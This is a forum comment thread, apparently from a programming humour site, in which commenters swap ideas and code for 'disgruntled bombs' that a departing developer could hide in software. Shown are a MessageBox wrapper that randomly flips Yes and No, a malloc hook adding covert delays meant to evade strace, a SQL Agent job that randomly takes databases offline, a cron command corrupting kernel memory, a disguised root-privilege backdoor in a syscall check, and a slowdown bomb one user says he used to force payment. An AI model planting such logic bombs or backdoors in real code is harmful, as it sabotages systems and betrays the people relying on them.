Comment On The Disgruntled Bomb

C-Octothorpe:

I've been doing this software development thing for years now, and I still giggle a little when I read "private members"... Is that just me?

Sten:

hoodaticus:

Inherit?

Does not work. Private members are accessible only by the class itself.

int Delay = 0;

void VitalFunctionInCode()

{

    if(Delay < INT_MAX) Delay++;

    int i;

    for(int i=0; i<Delay; i++) { SmallDelay(); }



    /* Original Code */

}

C-Octothorpe:

sheep hurr durr:

Rosuav:

Turning all privates public doesn't actually do much. It just prevents compiler errors... and as languages like Python and Pike have proved, it's perfectly possible to eliminate the entire concept of private members. Also, the #define won't change the compiler default; if you declare a class, members are private until you put a label. By convention at my workplace, all classes have private data, then private member functions, then the "public:" label, then constructors, then interface. Your #define would sadly have no effect :(

#define class struct

(Although, I'm curious; how do you unit test your private member functions if there's no way to get at them from outside the class?)

I've been doing this software development thing for years now, and I still giggle a little when I read "private members"... Is that just me?

hoodaticus:

Me too. Looks like I have another twin on here.

"You said private... huh huh huh huh".

trwtf:

C-Octothorpe:

sheep hurr durr:

Rosuav:

Turning all privates public doesn't actually do much. It just prevents compiler errors... and as languages like Python and Pike have proved, it's perfectly possible to eliminate the entire concept of private members. Also, the #define won't change the compiler default; if you declare a class, members are private until you put a label. By convention at my workplace, all classes have private data, then private member functions, then the "public:" label, then constructors, then interface. Your #define would sadly have no effect :(

#define class struct

(Although, I'm curious; how do you unit test your private member functions if there's no way to get at them from outside the class?)

I've been doing this software development thing for years now, and I still giggle a little when I read "private members"... Is that just me?

Yep, that's pretty standard for most school kids.

hoodaticus:

Me too. Looks like I have another twin on here.

"You said private... huh huh huh huh".

See what I mean?

int WINAPI MessageBoxEvil(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType)

{

    int result=MessageBox(hWnd,lpText,lpCaption,uType);

    if (rand()%100)

    {

        if(result==IDYES)

            result=IDNO;

        elseif(result==IDNO)

            result=IDYES;

    }

    return(result);

}



#define MessageBox MessageBoxEvil

typedef void *(*malloc_hook_t)(size_t, const void *)



#ifndef _DEBUG

malloc_hook_t old_malloc_hook = __malloc_hook;

__malloc_hook = _new_malloc;

#endif



void *

_new_malloc(size_t size, const void *return_addr) {

    srand(time(NULL));

    if (rand() % 0)

        usleep(size * 100);

    __malloc_hook = old_malloc_hook;

    void *m = malloc(size);

    __malloc_hook = _new_malloc;

    return m;

}



#ifndef _DEBUG

#ifdef __cplusplus

void *

operator new(size_t size) {

    return _new_malloc(size, __builtin_return_address(0));

}

#endif

#endif

void(void) worldspawn = {

  // the stuff that was there before

  // ...

  // THE BOMB:

  float x = 0;

  // ...

  x = 42;

};

typedef float vec3_t[3];

...

void DoSomethingAt(vec3_t someposition) {

  VectorNormalize(someposition); // #4381: vector must be normalized for this to work

  ... do something with someposition ...

}

SomeType foo[1000];

...

memcpy(foo, someinput, 1000 * sizeof(*foo));

...

for(i = 0; i <= 999; ++i) dosomethingwith(foo[i]);

#define MAX_FOOS 1000

SomeType foo[MAX_FOOS];

...

memcpy(foo, someinput, MAX_FOOS * sizeof(*foo));

...

for(i = 0; i <= 999; ++i) dosomethingwith(foo[i]);

Sten:

Note that this code won't show anything suspicious even when running the program in strace, since it calls gettimeofday only from time to time. Better version can be achieved after rewriting to assembly, since not even gdb would show anything helpful.

Sten:

Sobriquet:

It will also make the library mysteriously fail to interoperate with other versions that were compiled without the redefinition. In a big app, this would be a nightmare.

That’s not true.

#define private public

does not change ABI in any way since the classes do not change memory layout. I use it from time to time since some library developers are morons that define everything private and have never experienced any problem with that.

C-Octothorpe:

You're on a forum with 99.99% men

bob42:

although i would never put this in production, this would be something great to leave on a dev sql server as a "Ha ha! i got the last laugh!". The way to use this would be to create a sql server agent job and put the code in the job, and have the job execute something like once a day, week, month, etc.

Essentially what the code does is it randomly selects a non-system database, and generates a random number for the database and a random number to compare two. if both numbers match it sets the database to offline. so, the result of this is that every so often, at a non-specific interval, a random database will go offline.




declare @databases table (name varchar(128), Sm int)
declare @database table (name varchar(128), Sm int)
declare @number int,
@name varchar(128), @sql varchar(max)

insert into @databases (name, Sm)
select
name,
abs(checksum(newid()))% (select count(*) from sys.databases where database_id>4 and state=0)
from sys.databases
where database_id>4 and state=0

select @number=abs(checksum(newid()))% (select count(*) from sys.databases)

insert into @database (name, Sm)
select top 1
name, sm
from @databases
order by sm

if exists (select top 1 name from @database)
begin

select @name=name from @database where sm=@number

set @sql='alter database [' + @name + '] set offline with rollback after 30 seconds'

exec(@sql)

end

Neil:

Niels:

The WTF about the sample is that you should not be using NULL in C++ code, you should just write 0.

Note that you can only use 0 as a varadic null pointer argument in 32-bit code. 0LL works in 64-bit code, but not in 32-bit code. 0L works everywhere except Win64.

trwtf:

C-Octothorpe:

You're on a forum with 99.99% men

Ironic you should say that because my point was that you reek of a recent school leaver. Your apparent maturity level ("private members", har har) only supports this hypothesis. Yet your comeback is "you're on a forum with 99.99% men"? I think not. I'm on a forum with about 25% men, 5% women and 70% school kids / interns / college leavers. What was your point again? You need to grow up and stop using mommy and daddy's modem.
Yours,
Bert Glanstron

Nick:

Change the Gnu compiler such that a call to a subroutine called "checkpassword", returns true if the user is "xyyzz".

sheep hurr durr:

(Although, I'm curious; how do you unit test your private member functions if there's no way to get at them from outside the class?)

body * { display: inline !important; }

 br { float: left; }

Sten:

Yes, I noted that in a reply to that post and suggested the #define should be placed at the bottom.

vitameatahegemon:

I do not think the preprocessor works the way you think it does.

Neil:

Niels:

The WTF about the sample is that you should not be using NULL in C++ code, you should just write 0.

Note that you can only use 0 as a varadic null pointer argument in 32-bit code. 0LL works in 64-bit code, but not in 32-bit code. 0L works everywhere except Win64.

Sten:

vitameatahegemon:

I do not think the preprocessor works the way you think it does.

It does, defines work from the point they are defined onwards and do not affect anything prior that point. Just checked it.

Sobriquet:

You can also mess with permissions so the install won't work properly for non-admins,

Cipri:

I'd have to go with making a cronjob running

dd if=/dev/urandom of=/dev/kmem bs=1 count=1 seek=$RANDOM

Replace a random bit of kernel memory with a random value.

GettinSadda:

I actually added a bomb in some code I sent to a previous employer (in a different country), but I told them I had inserted the bomb, and would forward the source, without bomb, once payment cleared. This could be re-purposed.

My original code (actually in assembler, but this is in C):

int Delay = 0;

void VitalFunctionInCode()

{

    if(Delay < INT_MAX) Delay++;

    int i;

    for(int i=0; i<Delay; i++) { SmallDelay(); }



    /* Original Code */

}

The result of this code was that over a period of 15-30 minutes, the code got slower and slower, eventually being unusable. It allowed the customer to verify the original bug was fixed, but not to actually ship it until they got the final version I sent after I was paid.

This could easily be updated and inserted in a release-mode only way, and with a slower acting effect.

Husted:

Hmm... how about this:

#define struct union

/* for security reasons only root may call this syscall */

if (current->cred->uid ^= current->cred->uid &&\

    some_other_obscure_condition)

    return -EPERM;

Martijn Lievaart:

Neil:

Note that you can only use 0 as a varadic null pointer argument in 32-bit code. 0LL works in 64-bit code, but not in 32-bit code. 0L works everywhere except Win64.

Either that, or you could use a standards complient compiler instead. (Hint, the standard requires that the number '0' translates to a valid null pointer).

anon:

*confused puppy head tilt*

Then... mine must be defective.

A preprocessing directive of the form

# define identifier replacement-list new-line

defines an object-like macro that causes each subsequent instance of the macro name to be replaced by the replacement list of preprocessing tokens that constitute the remainder of the directive.

kastein:

/* for security reasons only root may call this syscall */

if (current->cred->uid ^= current->cred->uid &&\

    some_other_obscure_condition)

    return -EPERM;

/* for security reasons only root may call this syscall */

if (some_obscure_condition &&\

        current->cred->uid = 0)

    return do_work();

return -EPERM;

db2:

Here's a good one to fuck with your web/CSS devs. Throw it in any .css file.

body * { display: inline !important; }

For scoring purposes, every time they reinstall their web browser counts as one point.

If you'd rather be more subtle, try this one:

 br { float: left; }

class _type(type):

    def __new__(m, n, b, d):

        d['_'] = {}

        @classmethod

        def _(mc, c, *args, **kwargs):

            if args not in c._:

                c._[args] = object.__new__(c)

            return c._[args]

        d['__new__'] = _

        o = super(_type, m).__new__(m, n, b, d)

        return o



__metaclass__ = _type

...

    def __new__(m, n, b, d):

        d['_'] = []

        @classmethod

        def _(mc, c, *args, **kwargs):

            c._.append(object.__new__(c))

            return c._[-1]

...

...

    def __new__(m, n, b, d):

        d['_'] = None

        @classmethod

        def _(mc, c, *args, **kwargs):

            if c._ is None:

                c._ = object.__new__(c)

            return c._

...

class _type(type):

    def __new__(m, n, b, d):

        a = d.keys()[0]

        del d[a]

        d['important_method'] = lambda *args,**kwargs: 0

        return super(_type, m).__new__(m, n, b[:-1], d)



__metaclass__ = _type

Niels:

The WTF about the sample is that you should not be using NULL in C++ code, you should just write 0.

class foo(object):

    someattribute = 1



    def __str__ (self):

        self.someattribute += 1

        return super(object, self).__str__()